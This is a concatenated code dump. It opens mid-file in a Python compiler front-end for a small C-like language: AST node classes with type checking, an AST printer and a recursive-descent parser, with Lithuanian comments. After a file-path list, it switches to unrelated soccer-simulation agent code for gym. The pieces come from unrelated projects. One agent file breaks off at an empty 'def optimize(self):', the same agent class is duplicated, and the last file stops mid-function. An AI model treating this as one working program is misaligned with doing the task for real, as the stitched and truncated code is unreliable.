self.for_cond.check_types()
self.for_step.check_types()
self.for_body.check_types()
# panasiai kaip su if
# tikr tipus salygoje
# ...
class StmtWhile(Stmt):
def __init__(self, cond, body):
self.add_children(cond, body)
self.cond = cond
self.body = body
super().__init__()
def print_node(self, p):
p.print('cond', self.cond)
p.print('body', self.body)
def resolve_names(self, scope):
self.cond.resolve_names(scope)
self.body.resolve_names(scope)
def check_types(self):
cond_type = self.cond.check_types()
unify_types(cond_type, TYPE_BOOL, self.cond.get_token())
self.body.check_types()
class StmtControlFlow(Stmt):
def __init__(self, keyword):
self.keyword = keyword
super().__init__()
def print_node(self, p):
p.print('keyword', self.keyword)
def resolve_names(self, scope):
self.target_node = self.ancestor_loop()
if not self.target_node:
# todo rm this hack
if "BREAK" in self.keyword.type:
kw = "break"
else:
kw = "continue"
semantic_error3(f'"{kw}" not inside a loop statement', self.keyword)
def check_types(self):
pass
class StmtBreak(StmtControlFlow):
pass
class StmtContinue(StmtControlFlow):
pass
# koks gi pas mus ret type?
class StmtReturn(Stmt):
# unique_ptr<Expr> value;
def __init__(self, return_kw, value=None):
self.add_children(value)
self.return_kw = return_kw
self.value = value
super().__init__()
def print_node(self, p):
if not self.value:
p.print('keyword', self.return_kw)
else:
p.print('value', self.value)
def resolve_names(self, scope):
if self.value:
self.value.resolve_names(scope)
# todo ret_type <- method?
def check_types(self):
# ret_type = ancestor_fn.ret_type
# ret_type = find_ancestor(&DeclFn)
if self.value:
value_type = self.value.check_types()
token = self.value.get_token()
else:
value_type = TYPE_VOID
token = self.return_kw
ret_type = self.find_ancestor(DeclFn).ret_type
# todo pythonize?
# &. iskvies fn jei n...
unify_types(ret_type, value_type, token)
# unify_types(ret_type, value_type, @return_kw)
# var a: int = 5
class StmtVarDecl(Stmt):
# attr_accessor :slot_index
def __init__(self, name, type_, value=None):
# todo do I need to add type_ here?
self.add_children(type_, value)
self.name = name
self.type = type_
self.value = value
super().__init__()
def print_node(self, p):
p.print('name', self.name)
p.print('type', self.type)
if self.value:
p.print('value', self.value)
def resolve_names(self, scope):
scope.add(self.name, self)
if self.value:
self.value.resolve_names(scope)
def check_types(self):
if not self.type.has_value():
# todo maybe print token of a type, not of a name
semantic_error3(f'variable\'s type cannot be void or pointer to void', self.name)
if self.value:
value_type = self.value.check_types()
unify_types(self.type, value_type)
class StmtAssign(Stmt):
def __init__(self, lhs, op, value):
self.add_children(lhs, value)
self.lhs = lhs
self.op = op
self.value = value
super().__init__()
def print_node(self, p):
# or lhs = target
p.print('lhs', self.lhs)
p.print_single('op', self.op)
p.print('value', self.value)
# p.print('target_node', @target_node.class.to_s)
def resolve_names(self, scope):
# todo lhs=var
# self.lhs ExprVar yra, o ne token. Turi eiti gylyn gylyn, kol token ras (ir pointeriai ten viduj, etc.
# todo put this under suspicion
self.target_node = self.lhs.resolve_names(scope)
# self.target_node = scope.resolve(self.lhs)
self.value.resolve_names(scope)
def check_types(self):
target_type = None
# todo jei exprunary nebutinai targetnode type
if self.target_node:
target_type = self.lhs.check_types()
# target_type = @target.type
# print(target_type.inner.kind)
value_type = self.value.check_types() # jis visada kazkoks bus, nereik tikrint kasd jis su void bus
# todo return?
# target_node jau prisyreme vardu rez metu
# unifyt_types(@target_node&.type, value_type)
# cia jei target_type nera, tai nil paduoti, ir viduj jau error gausim
if target_type:
if self.op != "EQUALS" and not target_type.is_arithmetic():
semantic_error3(f'cannot perform arithmetic assign operation with this type: {target_type.kind}',
self.lhs.name)
unify_types(target_type, value_type, self.value.get_token())
else:
raise InternalError("no target type")
# def to_s
# '%s' % [@kind]
# end
class StmtExpr(Stmt):
def __init__(self, expr):
self.add_children(expr)
self.expr = expr
super().__init__()
def print_node(self, p):
p.print('expr', self.expr)
def resolve_names(self, scope):
self.expr.resolve_names(scope)
def check_types(self):
# ar self.name?
return self.expr.check_types()
# class StmtLet
# def resolve_names(scope)
# scope.add(@name, self)
# end
# end
# abstract
class Expr(Node):
def __init__(self):
pass
super().__init__()
# foo(a, b, c + 5)
class ExprFnCall(Expr):
def __init__(self, name, args):
self.add_children(args)
self.add_children(*args)
self.name = name
self.args = args
if self.name.value in ('in', 'disp'):
self.builtin = True
else:
self.builtin = False
super().__init__()
def print_node(self, p):
p.print('name', self.name)
p.print('args', self.args)
# p.print('builtin', self.builtin)
def get_token(self):
return self.name
def resolve_names(self, scope):
if not self.builtin:
self.target_node = scope.resolve(self.name)
else:
# self.target_node = ???
pass # todo
for arg in self.args:
arg.resolve_names(scope)
def check_types(self):
# masyvui args every elementui pritaikau fn check_types ir nauja masyva turi
arg_types = [arg.check_types() for arg in self.args]
# ar daiktas i kuri kreipiames apskr. egzistuoj?
# TODO cia bus built-in f-ja tikriausiai
if not self.target_node:
return
elif not isinstance(self.target_node, DeclFn):
semantic_error3('the call target is not a function', self.name)
return
# zinome, kad radome fja, i kuria kreipemes
# todo is type() a fn?
param_types = [param.type for param in self.target_node.params]
if len(param_types) != len(arg_types):
semantic_error3(f'invalid argument count; expected {len(param_types)}, got {len(arg_types)}', self.name)
# min tarp dvieju skaiciu koks?
param_count = min(len(param_types), len(arg_types))
for i in range(0, param_count):
param_type = param_types[i] # arba self.target.params[i].type()
arg_type = arg_types[i] # arba args[i].check_type()
# patikrinu bent kazkiek tai argsu kiek ju yra.
# pvz fjoj prasyta bent 4 param, o pateikiu bent 2 args, tai patikrinu bent tuos du
# jei fjojs 1 arg parasyta, o pateikiu 2, tai patikrinu tik ta viena.
unify_types(param_type, arg_type, self.args[i].get_token())
# kazka pasakau koks cia tipas etc...
return self.target_node.ret_type
class ExprBinary(Expr):
def __init__(self, kind, op, left, right):
self.add_children(left, right)
self.kind = kind
self.op = op
self.left = left
self.right = right
self.type = None
super().__init__()
def print_node(self, p):
p.print_single('kind', self.kind)
p.print_single('op', self.op)
p.print('left', self.left)
p.print('right', self.right)
def get_token(self):
return self.left.get_token()
def resolve_names(self, scope):
self.left.resolve_names(scope)
self.right.resolve_names(scope)
# visiem binary op negalim parasyti viena tipu tikr klases
# class ExprBinary
# ExprArith: T + T -> T
# ExprLogic: B | B -> B
# ExprEquality: T == T -> B
# ExprComparison: T < T -> B
# Arithmetic expressions: a + b, a * b
# Comparison expressions: a > b, a < b => BOOL
# Boolean expressions: a && b, a || b
# Arithmatic Exprs: + - / * %
# Relational Exprs: < > >= <=
# Equality Exprs: != ==
# Boolean Exprs: && ||
# type+type -> type; is_arithmetic (bool+bool wrong, etc.)
# ExprBinArith: TYPE + TYPE -> TYPE; is_arithmetic
# class ExprBinArith < ExprBinary
# end
# virsta abs klase. Parseryje irgi pakeisti sita, kad grazinti konkrecias klases, o ne ExprBinary
class ExprBinArith(ExprBinary):
# veliau turesim kiek praplesti sita aritm israisk
def check_types(self):
left_type = self.left.check_types()
right_type = self.right.check_types()
# turet omeny kad ir voidas i kaire puse gali ateit!
if left_type and left_type.is_arithmetic():
unify_types(left_type, right_type, self.right.get_token())
else:
# nezinom kurioj vietoj
# todo pointers error (kind->unwrap)
semantic_error3(f'cannot perform arithmetic operations with this type: {left_type.kind}',
self.left.get_token())
return left_type # nres reik grazinti tipa taip mums
# ExprBinComparison: TYPE < TYPE -> BOOL; is_comparable
# class ExprBinComparison < ExprBinary
# end
# type < type -> bool; is_comparable (bool siaip jau nelabai compariname)
# monoton didjancios
# exprbinquality: type == type -> bool; has_value (tik = arba != (neturi buti voidas))
class ExprBinComparison(ExprBinary): # > < == !=
def check_types(self):
left_type = self.left.check_types()
right_type = self.right.check_types()
# todo define curr_token for errors
# nes desine puse netikrint, nes jei ten bus null ar pan,
# tai priklausys nuo LHS desine puse ir failins unify_types
if left_type and left_type.is_comparable():
unify_types(left_type, right_type)
else:
# fixme this does not return object with token attribute
# nezinom kurioj vietoj
semantic_error3(f'cannot compare values of this type: {left_type.kind}', self.left.get_token())
# unify_types(left_type, right_type)
# TypeBool.new
# TYPE_BOOL
return TypePrim('bool')
# ExprBinEquality: TYPE == TYPE -> BOOL; has_value
# class ExprBinEquality < ExprBinary
# end
class ExprBinEquality(ExprBinary):
def check_types(self):
left_type = self.left.check_types()
right_type = self.right.check_types()
if left_type and left_type.has_value():
# todo should i print more understandable error here?
unify_types(left_type, right_type)
else:
semantic_error3(f'this type has no value to compare: {left_type.kind}', self.left.get_token())
return TypePrim('bool')
# ExprBinLogic: BOOL || BOOL -> BOOL
# class ExprBinLogic < ExprBinary
# end
# visada left=bool, right=bool
class ExprBinLogic(ExprBinary):
def check_types(self):
left_type = self.left.check_types()
right_type = self.right.check_types()
unify_types(TYPE_BOOL, left_type, self.left.get_token())
# TODO reverse order everywhere as well (left-param - expected type, right-param - got)
unify_types(TYPE_BOOL, right_type, self.right.get_token())
return TYPE_BOOL
# class ExprPrio < Expr
# def initialize(inner)
# @inner = inner
# end
#
# def print(p)
# p.print 'inner', @inner
# end
# def resolve_names(self, scope):
# self.inner.resolve_names(scope)
# end
# end
class ExprUnary(Expr):
def __init__(self, inner, op):
self.add_children(inner)
self.inner = inner
self.op = op
super().__init__()
def print_node(self, p):
p.print('inner', self.inner)
p.print_single('op', self.op)
def resolve_names(self, scope):
self.target_node = self.inner.resolve_names(scope)
return self.target_node
def get_token(self):
inner = self.inner
# todo remove this while loop
while isinstance(inner, TypePointer):
inner = inner.inner
return inner.get_token()
def check_types(self):
if isinstance(self.parent, StmtAssign) and self.parent.lhs == self:
# todo is this error formulated correctly?
# todo add token info for error handling here
semantic_error3('assignment lvalue cannot be unary expression', self.get_token())
return TypeErr(self.get_token())
elif not self.op == 'NOT':
if self.target_node:
return self.target_node.type
else:
semantic_error3('cannot apply unary operator on that which follows the operator', self.get_token())
return TypeErr(self.get_token())
else:
type_ = self.inner.check_types()
unify_types(TYPE_BOOL, type_, self.get_token())
return type_
class ExprDeref(ExprUnary):
def has_address(self):
return True
def is_mutable(self):
return True
def check_types(self):
# todo maybe useless check, since has_address() exists
if not self.target_node:
semantic_error3('cannot dereference that which follows the dereference operator', self.get_token())
return TypeErr(self.get_token())
elif not isinstance(self.target_node.type, TypePointer):
semantic_error3('value to dereference is not a pointer', self.get_token())
# todo duplicates here, since it is already type error, because it is function name without parenthesis?
return TypeErr(self.get_token())
# todo del PTR_ADDR galimybes??
elif self.inner.has_address():
inner = self.inner
target_inner = self.target_node.type.inner
while isinstance(inner, ExprDeref):
if isinstance(target_inner, TypePointer):
inner = inner.inner
target_inner = target_inner.inner
else:
# todo add token info for error handling here
semantic_error3(f'primary type ({target_inner.kind}) cannot be dereferenced', self.get_token())
return TypeErr(self.get_token())
return target_inner
else:
# todo add token info for error handling here
# todo to prevent ex. $++a;
# todo but if a is int, not a pointer, then we get the error above (var deref is not a pointer type),
# todo ...and it is not correct
semantic_error3('value to dereference is not a pointer', self.get_token())
return TypeErr(self.get_token())
class ExprAddress(ExprUnary):
def has_address(self):
return True
def check_types(self):
if self.inner.has_address():
return TypePointer(self.inner.check_types())
# todo is it pointer, pointer value literal or just int?
else:
# todo now exprUnary name token is used for error, not the token
# todo ...going after the PTR_ADDR operator
semantic_error3('wrong value to address', self.inner.get_token())
class ExprVar(Expr):
def __init__(self, name):
self.name = name
# todo why is that?
# self.target = None
super().__init__()
def print_node(self, p):
p.print('name', self.name)
def get_token(self):
return self.name
def has_address(self):
return True
def is_mutable(self):
return True
def resolve_names(self, scope):
self.target_node = scope.resolve(self.name)
return self.target_node
def check_types(self):
# t-node jau vardu rez metu priskyreme jam (varui)
# @target_node&.type #(jei kairej nil, arba abiejose sides nil, tai skipinam unify types (remember))
# todo add raise InternalError on else
if self.target_node: # arba if @target.respond_to?(:type)
if isinstance(self.target_node, DeclFn):
semantic_error3('function name cannot be used as a variable', self.name)
# fixme temp fix here
return TypeErr(self.name)
return self.target_node.type
# todo repeat for every class
else:
return TypeErr(self.name)
class ExprLit(Expr):
def __init__(self, lit, kind):
self.lit = lit
self.kind = kind
super().__init__()
def print_node(self, p):
p.print('lit', self.lit)
p.print_single('kind', self.kind)
# todo some objs have this fn, some do not. Is it ok?
# todo ...maybe move this fn to ExprBinary class
def get_token(self):
return self.lit
def resolve_names(self, scope):
pass # do nothing
def check_types(self):
if self.lit.type == 'LIT_INT':
return TYPE_INT
elif self.lit.type == 'LIT_FLOAT':
return TYPE_FLOAT
elif self.lit.type in ['KW_TRUE', 'KW_FALSE']:
return TYPE_BOOL
elif self.lit.type == 'LIT_CHAR':
return TYPE_CHAR
elif self.lit.type == 'LIT_STR':
return TYPE_STRING
else:
raise InternalError('Bad ExprLit token')
# abstract
class Type(Node):
# def == (other)
# self.class == other.class
# end
def __init__(self):
pass
super().__init__()
def is_arithmetic(self):
return False
def has_value(self):
return False
def is_comparable(self):
return False
# class TypeBool < TypePrim # or tsg Type?
# def print(p)
# end
#
# def to_s
# 'bool'
# end
# end
#
# class TypeInt < TypePrim
# def print(p)
# end
#
# def to_s
# 'int'
# end
# end
#
# class TypeVoid < TypePrim
# def print(p)
# end
#
# def to_s
# 'void'
# end
# end
#
class TypePointer(Type):
def __init__(self, inner):
# todo is add_children needed here?
self.add_children(inner)
self.inner = inner
super().__init__()
def print_node(self, p):
p.print('inner', self.inner)
def has_value(self):
return self.inner.has_value()
def unwrap(self, depth=1):
if isinstance(self.inner, TypePointer):
return self.inner.unwrap(depth + 1)
elif isinstance(self.inner, TypePrim):
return f'{self.inner.kind}{depth * "$"}'
else:
raise InternalError('pointer to something other than primary type')
# todo is it needed?
# def resolve_names(self, scope):
# ...
class TypePrim(Type):
def __init__(self, kind, token=None):
self.kind = kind
# todo is token attribute needed?
self.token = token
super().__init__()
def print_node(self, p):
p.print_single('kind', self.kind)
def is_arithmetic(self):
return self.kind == 'float' or self.kind == 'int'
# jei tipas reiksme tures su kuria operacijas galim atlikti
def has_value(self):
return self.kind != 'void'
def is_comparable(self):
# todo return self.kind == 'FLOAT' or self.kind == 'INT' ??
return self.kind == 'int' or self.kind == 'float'
def unwrap(self):
return self.kind
class TypeErr(Type):
def __init__(self, token):
self.kind = 'ERROR'
self.token = token
super().__init__()
def is_arithmetic(self):
return False
def has_value(self):
return False
def is_comparable(self):
return False
def unwrap(self):
return self.kind
# todo move these definitions and others to centralized place somewhere
TYPE_VOID = TypePrim('void')
TYPE_INT = TypePrim('int')
TYPE_FLOAT = TypePrim('float')
TYPE_BOOL = TypePrim('bool')
TYPE_CHAR = TypePrim('char')
TYPE_STRING = TypePrim('string')
--- FILE SEPARATOR ---
from lexer import Token
from errors import InternalError
from .ast import Node
from termcolor import cprint
class ASTPrinter:
def __init__(self):
self.indent_level = 0
def print(self, title, obj):
if isinstance(obj, Node):
self.print_node(title, obj)
elif isinstance(obj, list):
self.print_array(title, obj)
elif isinstance(obj, Token):
self.print_token(title, obj)
elif not obj:
self.print_single(title, 'NULL')
else:
raise InternalError(f'bad argument {obj.__class__.__name__}')
def print_array(self, title, array):
if not array:
self.print_single(title, '[]')
for ind, el in enumerate(array):
self.print(f'{title}[{ind}]', el)
def print_node(self, title, node):
self.print_single(title, f'{node.__class__.__name__}:')
self.indent_level += 1
node.print_node(self)
self.indent_level -= 1
def print_single(self, title, text):
prefix = ' ' * self.indent_level
cprint(f'{prefix}{title}: {text}', 'blue', attrs=['bold'])
def print_token(self, title, token):
if token.value == '':
text = f'{token.type} (ln={token.line_no})'
else:
text = f'{token.value} (ln={token.line_no})'
self.print_single(title, text)
--- FILE SEPARATOR ---
from lexer import Token, Input
from errors import ParserError, ParserDebugError
from .ast import Node, TypePrim, ExprLit, ExprVar, ExprUnary, ExprDeref, ExprAddress, ExprBinArith, ExprBinComparison, \
ExprBinEquality, ExprBinLogic, ExprFnCall, Param, Program, DeclFn, StmtBlock, StmtIf, \
StmtWhile, StmtBreak, StmtContinue, StmtReturn, StmtExpr, StmtAssign, StmtVarDecl, \
IfBranch, TypePointer, StmtFor
assign_ops = {
'OP_ASSIGN_EQ': 'EQUALS',
'OP_ASSIGN_SUM': 'PLUS_EQUALS',
'OP_ASSIGN_SUB': 'MINUS_EQUALS',
'OP_ASSIGN_MUL': 'MULT_EQUALS',
'OP_ASSIGN_DIV': 'DIV_EQUALS',
'OP_ASSIGN_MOD': 'MOD_EQUALS',
}
unary_ops = {
'OP_INCR': 'INCR',
'OP_DECR': 'DECR',
'OP_NOT': 'NOT',
'OP_PTR': 'PTR_DEREF',
'OP_PTR_ADDR': 'PTR_ADDR',
}
primary_types_keywords = {
'KW_BOOL': 'bool',
'KW_FLOAT': 'float',
'KW_INT': 'int',
'KW_VOID': 'void',
'KW_CHAR': 'char',
'KW_STR': 'string',
}
statement_keywords = [
'KW_IF',
'KW_FOR',
'KW_WHILE',
'KW_BREAK',
'KW_CONTINUE',
'KW_RETURN',
]
class Parser:
curr_input: Input
tokens: list
offset: int
curr_token: Token
result: Node
def __init__(self, curr_input, tokens) -> None:
self.curr_input = curr_input
self.tokens = tokens
self.offset = 0
self.curr_token = self.tokens[self.offset]
self.result = Node()
def accept(self, token_type):
token = self.curr_token
if token.type == token_type:
self.offset += 1
self.curr_token = self.tokens[self.offset]
return token
else:
return False
def expect(self, token_type):
token = self.accept(token_type)
if token:
return token
else:
self.err(token_type)
def parse_program(self):
decls = []
while True:
if self.peek('EOF'):
# todo leave this hack?
eof = self.tokens[self.offset]
break
else:
decls.append(self.parse_decl())
return Program(decls, eof)
def parse_decl(self):
return self.parse_decl_fn()
def parse_decl_fn(self):
self.expect('KW_FN')
name = self.expect('IDENT')
params = self.parse_params()
self.expect('KW_FN_RET_ARROW')
ret_type = self.parse_type()
body = self.parse_stmt_block()
return DeclFn(name, params, ret_type, body)
def parse_param(self):
type_ = self.parse_type()
name = self.expect('IDENT')
return Param(name, type_)
def parse_params(self):
params = []
self.expect('OP_PAREN_O')
if self.peek('OP_PAREN_C'):
self.accept('OP_PAREN_C')
return params
else:
params.append(self.parse_param())
while not self.accept('OP_PAREN_C'):
self.expect('OP_COMMA')
params.append(self.parse_param())
return params
def parse_type(self):
token_type = self.curr_token.type
if token_type in primary_types_keywords.keys():
token = self.expect(token_type)
type_ = TypePrim(primary_types_keywords[token_type], token)
while self.accept('OP_PTR'):
type_ = TypePointer(type_)
return type_
else:
self.err('type name')
def parse_stmt_block(self):
self.expect('OP_BRACE_O')
stmts = []
while True:
if self.accept('OP_BRACE_C'):
break
else:
stmts.append(self.parse_stmt())
pass
return StmtBlock(stmts)
def parse_stmt(self):
stmt = ''
if self.peek('IDENT'):
if self.peek2('OP_PAREN_O'):
stmt = self.parse_stmt_expr(self.parse_expr_fn_call())
else:
stmt = self.parse_stmt_assign()
elif self.curr_token.type in unary_ops.keys():
unary_expr = self.parse_expr_unary()
if self.curr_token.type in assign_ops.keys():
stmt = self.parse_stmt_assign(unary_expr)
else:
stmt = unary_expr
elif self.peek('KW_IF'):
return self.parse_stmt_if()
elif self.peek('KW_FOR'):
return self.parse_stmt_for()
elif self.peek('KW_WHILE'):
return self.parse_stmt_while()
elif self.peek('KW_BREAK'):
stmt = self.parse_stmt_break()
elif self.peek('KW_CONTINUE'):
stmt = self.parse_stmt_continue()
elif self.peek('KW_RETURN'):
stmt = self.parse_stmt_ret()
elif self.curr_token.type in primary_types_keywords.keys():
stmt = self.parse_stmt_var_decl()
else:
self.err('legit token in the beginning of a statement')
self.expect('OP_SEMICOLON')
return stmt
def parse_stmt_if(self):
self.expect('KW_IF')
self.expect('OP_PAREN_O')
cond = self.parse_expr()
self.expect('OP_PAREN_C')
body = self.parse_stmt_block()
branches = [IfBranch(cond, body)]
if self.peek('KW_ELIF'):
while self.accept('KW_ELIF'):
self.expect('OP_PAREN_O')
cond = self.parse_expr()
self.expect('OP_PAREN_C')
body = self.parse_stmt_block()
branches.append(IfBranch(cond, body))
stmt_block = None
if self.peek('KW_ELSE'):
self.expect('KW_ELSE')
stmt_block = self.parse_stmt_block()
return StmtIf(branches, stmt_block)
def parse_stmt_for(self):
self.expect('KW_FOR')
self.expect('OP_PAREN_O')
for_init = for_cond = for_step = ''
if not self.accept('OP_SEMICOLON'):
if self.curr_token.type not in statement_keywords:
for_init = self.parse_stmt()
else:
self.err('for init condition (assignment, declaration, expression)')
if not self.accept('OP_SEMICOLON'):
for_cond = self.parse_expr()
self.expect('OP_SEMICOLON')
if not self.accept('OP_PAREN_C'):
for_step = self.parse_expr()
self.expect('OP_PAREN_C')
for_body = self.parse_stmt_block()
return StmtFor(for_init, for_cond, for_step, for_body)
def parse_for_cond(self):
if self.peek('IDENT'):
for assign_op in assign_ops.keys():
if self.peek2(assign_op):
return self.parse_stmt_assign()
else:
self.result = self.parse_expr()
self.expect('OP_SEMICOLON')
return self.result
def parse_stmt_while(self):
self.expect('KW_WHILE')
self.expect('OP_PAREN_O')
cond = self.parse_expr()
self.expect('OP_PAREN_C')
body = self.parse_stmt_block()
return StmtWhile(cond, body)
def parse_stmt_break(self):
break_kw = self.expect('KW_BREAK')
print(type(break_kw))
return StmtBreak(break_kw)
def parse_stmt_continue(self):
continue_kw = self.expect('KW_CONTINUE')
return StmtContinue(continue_kw)
def parse_stmt_ret(self):
return_kw = self.expect('KW_RETURN')
if self.curr_token.type != 'OP_SEMICOLON':
value = self.parse_expr()
else:
value = None
return StmtReturn(return_kw, value)
def parse_stmt_var_decl(self):
type_ = self.parse_type()
name = self.expect('IDENT')
value = None
if self.accept('OP_ASSIGN_EQ'):
value = self.parse_expr()
return StmtVarDecl(name, type_, value)
def parse_stmt_assign(self, lhs=None):
if not lhs:
lhs = self.parse_expr_unary()
op = ''
if self.curr_token.type in assign_ops.keys():
op = assign_ops[self.curr_token.type]
self.accept(self.curr_token.type)
else:
self.err('assign operator')
value = self.parse_expr()
return StmtAssign(lhs, op, value)
def parse_stmt_expr(self, expr):
self.result = expr
return StmtExpr(self.result)
def parse_expr_fn_call(self):
name = self.expect('IDENT')
args = []
self.expect('OP_PAREN_O')
if not self.peek('OP_PAREN_C'):
args.append(self.parse_expr())
while not self.peek('OP_PAREN_C'):
self.expect('OP_COMMA')
args.append(self.parse_expr())
self.expect('OP_PAREN_C')
return ExprFnCall(name, args)
def parse_expr(self):
return self.parse_expr_or()
def parse_expr_or(self):
self.result = self.parse_expr_and()
while True:
if self.accept('KW_OR'):
self.result = ExprBinLogic('logical_or', 'OR', self.result, self.parse_expr_and())
else:
break
return self.result
def parse_expr_and(self):
self.result = self.parse_expr_cmp()
while True:
if self.accept('KW_AND'):
self.result = ExprBinLogic('logical_and', 'AND', self.result, self.parse_expr_cmp())
else:
break
return self.result
def parse_expr_cmp(self):
self.result = self.parse_expr_rel()
while True:
if self.accept('OP_IS_EQ'):
self.result = ExprBinEquality('eq', 'EQUAL', self.result, self.parse_expr_rel())
elif self.accept('OP_IS_NEQ'):
self.result = ExprBinEquality('eq', 'NOT_EQUAL', self.result, self.parse_expr_rel())
else:
break
return self.result
def parse_expr_rel(self):
self.result = self.parse_expr_sum_sub()
while True:
if self.accept('OP_G'):
self.result = ExprBinComparison('cmp', 'GREATER', self.result, self.parse_expr_sum_sub())
elif self.accept('OP_GE'):
self.result = ExprBinComparison('cmp', 'GREATER_OR_EQUAL', self.result, self.parse_expr_sum_sub())
elif self.accept('OP_L'):
self.result = ExprBinComparison('cmp', 'LESS', self.result, self.parse_expr_sum_sub())
elif self.accept('OP_LE'):
self.result = ExprBinComparison('cmp', 'LESS_OR_EQUAL', self.result, self.parse_expr_sum_sub())
else:
break
return self.result
def parse_expr_sum_sub(self):
self.result = self.parse_expr_mul_div_mod()
while True:
if self.accept('OP_SUM'):
self.result = ExprBinArith('arith', 'ADD', self.result, self.parse_expr_mul_div_mod())
elif self.accept('OP_SUB'):
self.result = ExprBinArith('arith', 'SUB', self.result, self.parse_expr_mul_div_mod())
else:
break
return self.result
def parse_expr_mul_div_mod(self):
self.result = self.parse_expr_unary()
while True:
if self.accept('OP_MUL'):
self.result = ExprBinArith('arith', 'MUL', self.result, self.parse_expr_unary())
elif self.accept('OP_DIV'):
self.result = ExprBinArith('arith', 'DIV', self.result, self.parse_expr_unary())
elif self.accept('OP_MOD'):
self.result = ExprBinArith('arith', 'MOD', self.result, self.parse_expr_unary())
else:
break
return self.result
def parse_expr_unary(self):
if self.curr_token.type in unary_ops.keys():
op = unary_ops[self.curr_token.type]
self.accept(self.curr_token.type)
expr = self.parse_expr()
if op == 'PTR_DEREF':
return ExprDeref(expr, op)
elif op == 'PTR_ADDR':
return ExprAddress(expr, op)
else:
return ExprUnary(expr, op)
else:
return self.parse_expr_primary()
def parse_expr_primary(self):
if self.peek('IDENT'):
if self.peek2('OP_PAREN_O'):
return self.parse_expr_fn_call()
else:
return self.parse_expr_var()
elif self.peek('LIT_INT'):
return self.parse_expr_lit_int()
elif self.peek('LIT_FLOAT'):
return self.parse_expr_lit_float()
elif self.peek('LIT_CHAR'):
return self.parse_expr_lit_char()
elif self.peek('LIT_STR'):
return self.parse_expr_lit_str()
if self.peek('KW_NULL'):
return self.parse_expr_lit_null()
elif self.peek('KW_TRUE'):
return self.parse_expr_lit_true()
elif self.peek('KW_FALSE'):
return self.parse_expr_lit_false()
elif self.peek('OP_PAREN_O'):
return self.parse_expr_paren()
else:
self.err('type literal/NULL/parenthesis')
def parse_expr_lit_int(self):
lit = self.expect('LIT_INT')
return ExprLit(lit, 'INT')
def parse_expr_lit_float(self):
lit = self.expect('LIT_FLOAT')
return ExprLit(lit, 'FLOAT')
def parse_expr_lit_char(self):
lit = self.expect('LIT_CHAR')
return ExprLit(lit, 'CHAR')
def parse_expr_lit_str(self):
lit = self.expect('LIT_STR')
return ExprLit(lit, 'STR')
def parse_expr_lit_null(self):
lit = self.expect('KW_NULL')
return ExprLit(lit, 'NULL')
def parse_expr_lit_true(self):
lit = self.expect('KW_TRUE')
return ExprLit(lit, 'True')
def parse_expr_lit_false(self):
lit = self.expect('KW_FALSE')
return ExprLit(lit, 'False')
def parse_expr_paren(self):
self.expect('OP_PAREN_O')
self.result = self.parse_expr()
self.expect('OP_PAREN_C')
return self.result
def parse_expr_var(self):
name = self.expect('IDENT')
return ExprVar(name)
# helper functions
def peek(self, token_type):
return self.tokens[self.offset].type == token_type
def peek2(self, next_token_type):
return self.tokens[self.offset + 1].type == next_token_type
def err(self, exp_token=None, msg=None, debug=False):
if debug:
raise ParserDebugError(msg, *self.curr_token.get_char_info(), exp_token, self.curr_token.type)
else:
raise ParserError(msg, *self.curr_token.get_char_info(), exp_token, self.curr_token.type)
|
[
"/errors/errors.py",
"/lexer/__init__.py",
"/lexer/lexer.py",
"/main.py",
"/parser/__init__.py",
"/parser/ast.py",
"/parser/ast_printer.py",
"/parser/parser.py"
] |
00schen/AICooperation
|
from gym.spaces import Discrete
#Agent needs to know bounds, goal, kick, other player positions, player velocities
class Agent:
def __init__(self, player, env):
self.player = player
def select_action(self, state):
pass
def train(self, i_episode, done):
pass
--- FILE SEPARATOR ---
import random
from math import pi
from math import cos
from math import sin
from math import atan2
from Point import Point
from Agents.Agent import Agent
from gym.spaces import Discrete
class NaiveAgent(Agent):
def __init__(self, player, env):
super().__init__(player, env)
def select_action(self, state):
ball = state[-2]
if state[-1].x == 2 or state[-1].x == 1:
return (1, self.player.start_pos)
return (0, self.determine_action(ball))
def optimize(self):
--- FILE SEPARATOR ---
import random
from math import pi
from math import cos
from math import sin
from math import atan2
from Point import Point
from Agents.Agent import Agent
class NaiveAgent(Agent):
def __init__(self, player, env):
super().__init__(player, env)
def select_action(self, state):
ball = state[-2]
if state[-1].x == 2 or state[-1].x == 1:
return (1, self.player.start_pos)
return (0, self.determine_action(ball))
# def __side_reset(self, ball):
# r = random.uniform(10, 30)
# theta = random.uniform(0, 2*pi)
# p = Point(ball.x + r * cos(theta),
# ball.y + r * sin(theta))
# while (p.x > self.bounds[0] or p.x < 0) \
# or (p.y > self.bounds[1] or p.y < 0):
# r = random.uniform(10, 30)
# theta = random.uniform(0, 2*pi)
# p = Point(ball.x + r * cos(theta),
# ball.y + r * sin(theta))
# return p
def determine_action(self, ball):
speed_sq = self.player.x_vel**2 + self.player.y_vel**2
vel_angle = atan2(self.player.y_vel, self.player.x_vel)
q = self.player.center.sub(ball)
ball_dist_sq = q.x**2 + q.y**2
ball_angle = atan2(q.y, q.x)
print(vel_angle)
print(ball_angle)
if ball_dist_sq <= 200 and speed_sq > 100:
if vel_angle < ball_angle:
if vel_angle <= pi and vel_angle > pi / 2:
return 3
elif vel_angle <= pi / 2 and vel_angle > 0:
return 4
elif vel_angle <= 0 and vel_angle > pi / -2:
return 1
else:
return 2
elif vel_angle > ball_angle or speed_sq < 1:
if vel_angle <= pi and vel_angle > pi / 2:
return 2
elif vel_angle <= pi / 2 and vel_angle > 0:
return 3
elif vel_angle <= 0 and vel_angle > pi / -2:
return 4
else:
return 1
else:
if vel_angle < ball_angle:
if vel_angle <= pi and vel_angle > pi / 2:
return 4
elif vel_angle <= pi / 2 and vel_angle > 0:
return 1
elif vel_angle <= 0 and vel_angle > pi / -2:
return 2
else:
return 3
elif vel_angle > ball_angle or speed_sq < 1:
if vel_angle <= pi and vel_angle > pi / 2:
return 1
elif vel_angle <= pi / 2 and vel_angle > 0:
return 2
elif vel_angle <= 0 and vel_angle > pi / -2:
return 3
else:
return 4
--- FILE SEPARATOR ---
from SoccerEnv import SoccerEnv
from Soccer import *
from Point import Point
from Agents.NaiveAgent import NaiveAgent
def make(version):
env, agents = None, None
if version == "Naive":
env, agents = None, None
elif version == "test1":
env, agents = test1()
return env, agents
def run_simulation(version):
env, agents = make(version)
done = False
state = env.screen()
while not done:
actions = []
for agent in agents:
# Select and perform an action
actions.append(agent.select_action(state))
print(actions)
print(state)
state, _, done = env.step(actions)
done = env.render()
env.close()
def test1():
player1 = Player(Point(WIDTH / 3, HEIGHT / 2), 10, TEAM_BLUE)
